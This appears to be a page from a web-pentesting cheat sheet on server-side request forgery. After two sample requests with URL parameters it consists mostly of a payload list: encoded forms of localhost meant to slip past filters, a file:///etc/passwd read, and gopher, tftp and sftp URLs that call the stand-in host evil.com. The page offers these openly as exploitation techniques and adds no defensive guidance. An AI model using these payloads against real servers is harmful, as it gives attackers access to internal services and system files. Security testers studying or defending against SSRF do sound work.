SSRF

Usually, it can be found in the request that contain request to another url, for example like this

POST /api/check/products HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Origin: https://example.com
Referer: https://example.com

urlApi=http://192.168.1.1%2fapi%2f&id=1

GET /image?url=http://192.168.1.1/
Host: example.com

How to exploit

Basic payload

http://127.0.0.1:1337
http://localhost:1337

Hex encoding

http://127.0.0.1 -> http://0x7f.0x0.0x0.0x1

Octal encoding

http://127.0.0.1 -> http://0177.0.0.01

Dword encoding

http://127.0.0.1 -> http://2130706433

Mixed encoding

http://127.0.0.1 -> http://0177.0.0.0x1

Using URL encoding

http://localhost -> http://%6c%6f%63%61%6c%68%6f%73%74

Using IPv6

http://0000::1:1337/
http://[::]:1337/

Using bubble text

http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ

Use this https://capitalizemytitle.com/bubble-text-generator/

How to exploit (URI Scheme)

File scheme

file:///etc/passwd

Dict scheme

dict://127.0.0.1:1337/

FTP scheme

ftp://127.0.0.1/

TFTP scheme

tftp://evil.com:1337/test

SFTP scheme

sftp://evil.com:1337/test

LDAP scheme

ldap://127.0.0.1:1337/

Gopher scheme

gopher://evil.com/_Test%0ASSRF

PreviousSQL injection NextWeb Cache Deception

Last updated 1 year ago

hashtagHow to exploit

hashtagHow to exploit (URI Scheme)

How to exploit

How to exploit (URI Scheme)